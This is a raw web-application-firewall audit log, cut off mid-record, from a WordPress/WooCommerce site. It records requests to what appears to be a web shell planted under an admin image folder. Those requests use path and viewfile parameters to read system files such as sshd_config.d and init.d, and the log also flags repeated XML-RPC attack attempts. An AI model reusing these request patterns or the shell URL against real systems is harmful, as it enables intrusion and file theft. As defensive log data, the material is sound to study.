[tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1bdyZ4SMykfn97vy-3AAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/kmod"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1bdyZ4SMykfn97vy-3AAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119789036454 5731 (- - -) Stopwatch2: 1750119789036454 5731; combined=3281, p1=452, p2=2587, p3=57, p4=43, p5=142, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2406a713-Z-- --c675e707-A-- [17/Jun/2025:05:53:46.961633 +0530] aFC1kdyZ4SMykfn97vy-9AAAAAs 146.190.105.35 59164 127.0.0.1 7081 --c675e707-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=ii4gchk94o4hjb3qslqvouejcv; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f51433d131425ec0dd48cfe9fb4b8b%7C%7C1750292625%7C%7C1750289025%7C%7Cfcdeb49e7208cec5eb0d43c1bcdc652c; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=6ca8c3de1241857413bac410066829ff%7C%7C1750292625%7C%7C1750289025%7C%7C18e553fc9d8fb3c102a26fab31f29e2f User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --c675e707-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=jbvpalaufmv6i58ji1h94nd6kh; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_1187d3550eabdcfa4f97cdfc2c34bd%7C%7C1750292626%7C%7C1750289026%7C%7C67a1fdde7583767d8d421d18bea669c2; expires=Thu, 19 Jun 2025 00:23:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=9174f77c050be5394161e6479b3a331c%7C%7C1750292626%7C%7C1750289026%7C%7C94b0e3dbd08157f1bbf7ad8bfe75bcb5; expires=Thu, 19 Jun 2025 00:23:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c675e707-E-- --c675e707-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC1kdyZ4SMykfn97vy-9AAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119825921267 1040446 (- - -) Stopwatch2: 1750119825921267 1040446; combined=3205, p1=411, p2=2400, p3=103, p4=41, p5=158, sr=107, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c675e707-Z-- --b4f9ab1d-A-- [17/Jun/2025:05:54:05.157963 +0530] aFC1pRXnhE9cEv89BPm85QAAAAc 216.73.216.240 43944 127.0.0.1 7081 --b4f9ab1d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fdhcp&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fdhcp%2Fdhclient.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b4f9ab1d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3759 Connection: close Content-Type: text/html; charset=UTF-8 --b4f9ab1d-H-- Message: Warning. Matched phrase "etc/dhcp/dhclient.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/dhcp/dhclient.conf found within ARGS:viewfile: /snap/core20/current/etc/dhcp/dhclient.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/dhcp/dhclient.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/dhcp/dhclient.conf found within ARGS:viewfile: /snap/core20/current/etc/dhcp/dhclient.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1pRXnhE9cEv89BPm85QAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119845153560 4471 (- - -) Stopwatch2: 1750119845153560 4471; combined=2437, p1=378, p2=1928, p3=36, p4=37, p5=58, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b4f9ab1d-Z-- --06df6a00-A-- [17/Jun/2025:05:54:46.350868 +0530] aFC1zQJ4p5Cdblnjra5_vgAAAAI 146.190.105.35 42842 127.0.0.1 7081 --06df6a00-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=9op99m4btrqnic0ghfu3gbkhsu; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_80ef2d67d61bb837c7b20afbb4ac05%7C%7C1750292684%7C%7C1750289084%7C%7C77090cd87329f1f48325d142b2980e88; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c7bf401d7df5fd29494ab0324d33a5c7%7C%7C1750292685%7C%7C1750289085%7C%7C853bda8aa10d66accd8e3c0e02e92a88 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --06df6a00-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=h5c933ns7an7rpt9q2m8e7ku7f; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_58492e720fc3dc3d8aa15f88b9ca79%7C%7C1750292686%7C%7C1750289086%7C%7Ca4e02b872a83aa6861b67042393b18b4; expires=Thu, 19 Jun 2025 00:24:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=df1582e17630ca4bde1bd1c48a1ab121%7C%7C1750292686%7C%7C1750289086%7C%7C8d69274adcc63344e4d0f17fbefa6dc7; expires=Thu, 19 Jun 2025 00:24:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --06df6a00-E-- --06df6a00-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC1zQJ4p5Cdblnjra5_vgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119885313217 1037738 (- - -) Stopwatch2: 1750119885313217 1037738; combined=3193, p1=436, p2=2373, p3=99, p4=40, p5=154, sr=100, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --06df6a00-Z-- --d749a248-A-- [17/Jun/2025:05:55:46.172332 +0530] aFC2CdyZ4SMykfn97vy_XAAAAAs 146.190.105.35 56370 127.0.0.1 7081 --d749a248-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=nm8q2u7la49g9jmuq046nh56vv; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_9c95f0a85c8af023731c80b57ac7db%7C%7C1750292744%7C%7C1750289144%7C%7C46374d79ee374193e9463d267875d736; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a8f6db959100f53490de53c09b4fc09f%7C%7C1750292744%7C%7C1750289144%7C%7Cb70506c21fdde31992b6e53fab6ff46d User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --d749a248-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=eut1646bpnqnjhj5g4pvs44a0a; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_74bd763d7c83599682c9188a005b81%7C%7C1750292745%7C%7C1750289145%7C%7C7f61cec844309b1eaaaad34a3158016e; expires=Thu, 19 Jun 2025 00:25:45 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ccee89950197639f5f700ebe0e76e81b%7C%7C1750292746%7C%7C1750289146%7C%7C81b75bfd93c53fd46fdd609e67cdc685; expires=Thu, 19 Jun 2025 00:25:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d749a248-E-- --d749a248-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC2CdyZ4SMykfn97vy_XAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119945133641 1038773 (- - -) Stopwatch2: 1750119945133641 1038773; combined=3315, p1=390, p2=2390, p3=131, p4=42, p5=218, sr=95, sw=144, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d749a248-Z-- --b8eb171f-A-- [17/Jun/2025:05:56:04.534519 +0530] aFC2HBXnhE9cEv89BPm9TwAAAAc 54.197.82.195 51668 127.0.0.1 7081 --b8eb171f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/173 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.197.82.195 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --b8eb171f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --b8eb171f-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/173"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/173"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC2HBXnhE9cEv89BPm9TwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119964530054 4528 (- - -) Stopwatch2: 1750119964530054 4528; combined=2382, p1=378, p2=1880, p3=38, p4=28, p5=58, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b8eb171f-Z-- --34022a6c-A-- [17/Jun/2025:05:56:42.945508 +0530] aFC2QgJ4p5Cdblnjra6AJwAAAAI 216.73.216.240 44184 127.0.0.1 7081 --34022a6c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fssh%2Fsshd_config.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --34022a6c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3287 Connection: close Content-Type: text/html; charset=UTF-8 --34022a6c-H-- Message: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /proc/thread-self/root/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /proc/thread-self/root/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC2QgJ4p5Cdblnjra6AJwAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120002941143 4419 (- - -) Stopwatch2: 1750120002941143 4419; combined=2299, p1=345, p2=1821, p3=42, p4=33, p5=58, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --34022a6c-Z-- --a6207e69-A-- [17/Jun/2025:05:56:47.188574 +0530] aFC2RooVQnPDyHnl9oPbqgAAAAY 146.190.105.35 44338 127.0.0.1 7081 --a6207e69-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=pkb659s3vs0ep3totomf4qi5lf; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_fe908c9ae7825687f4b9acc626829e%7C%7C1750292805%7C%7C1750289205%7C%7Cc2526657307470be369e5b84f6ea6372; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=acc03ec80fa84c636e6fa62f057fedce%7C%7C1750292805%7C%7C1750289205%7C%7C5f4842c84e18e4c1240e0a9ed67e7f14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a6207e69-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=cg6nvejq5a284foivoukv0jhk5; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_a4430cd7e0924d1955f49925cc61e4%7C%7C1750292806%7C%7C1750289206%7C%7Cc544edc6799c6eb1833e81172ebd3f7a; expires=Thu, 19 Jun 2025 00:26:46 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8f1c45b0fcfbd0ed878bcbb8db556d60%7C%7C1750292807%7C%7C1750289207%7C%7Cfa75ae24fe27de999ec091a642c3f5e1; expires=Thu, 19 Jun 2025 00:26:47 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a6207e69-E-- --a6207e69-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC2RooVQnPDyHnl9oPbqgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120006018376 1170285 (- - -) Stopwatch2: 1750120006018376 1170285; combined=3316, p1=426, p2=2464, p3=96, p4=38, p5=194, sr=112, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a6207e69-Z-- --ce39502f-A-- [17/Jun/2025:05:57:47.849339 +0530] aFC2ghXnhE9cEv89BPm9nwAAAAc 146.190.105.35 44428 127.0.0.1 7081 --ce39502f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=enahmectd545ir8rutnr96igv2; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_20e877bb78356aeb1982b4ba10d4e0%7C%7C1750292866%7C%7C1750289266%7C%7Cf7d7f5afad6c4387641252be77d2d090; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=176386f9cbe1eb08f9dbc2e511f15927%7C%7C1750292866%7C%7C1750289266%7C%7C3815c36a82a8a879a4beeffcbb0097d6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --ce39502f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=pcs861cold75ktktd9e0be511s; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_87770e5a67d4fb1fe768219ad61c67%7C%7C1750292867%7C%7C1750289267%7C%7Ce9565ba0a2824515a1e8b72f3daa99d6; expires=Thu, 19 Jun 2025 00:27:47 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5345a73c56c09fef51eb47bed4db88cf%7C%7C1750292867%7C%7C1750289267%7C%7Cc6b3c4df5a5838d4d27db1280de2c99b; expires=Thu, 19 Jun 2025 00:27:47 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ce39502f-E-- --ce39502f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC2ghXnhE9cEv89BPm9nwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120066766977 1082453 (- - -) Stopwatch2: 1750120066766977 1082453; combined=3384, p1=446, p2=2462, p3=123, p4=41, p5=193, sr=125, sw=119, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ce39502f-Z-- --da461749-A-- [17/Jun/2025:05:58:26.527625 +0530] aFC2qlJfblPUQiSn5r2Z8gAAAAA 216.73.216.240 46084 127.0.0.1 7081 --da461749-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fapt%2Fapt.conf.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fapt%2Fapt.conf.d%2F99needrestart HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --da461749-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3199 Connection: close Content-Type: text/html; charset=UTF-8 --da461749-H-- Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /proc/thread-self/root/etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /proc/thread-self/root/etc/apt/apt.conf.d/99needrestart"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /proc/thread-self/root/etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC2qlJfblPUQiSn5r2Z8gAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /proc/thread-self/root/etc/apt/apt.conf.d/99needrestart"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC2qlJfblPUQiSn5r2Z8gAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120106522928 4752 (- - -) Stopwatch2: 1750120106522928 4752; combined=2455, p1=395, p2=1875, p3=52, p4=37, p5=95, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for 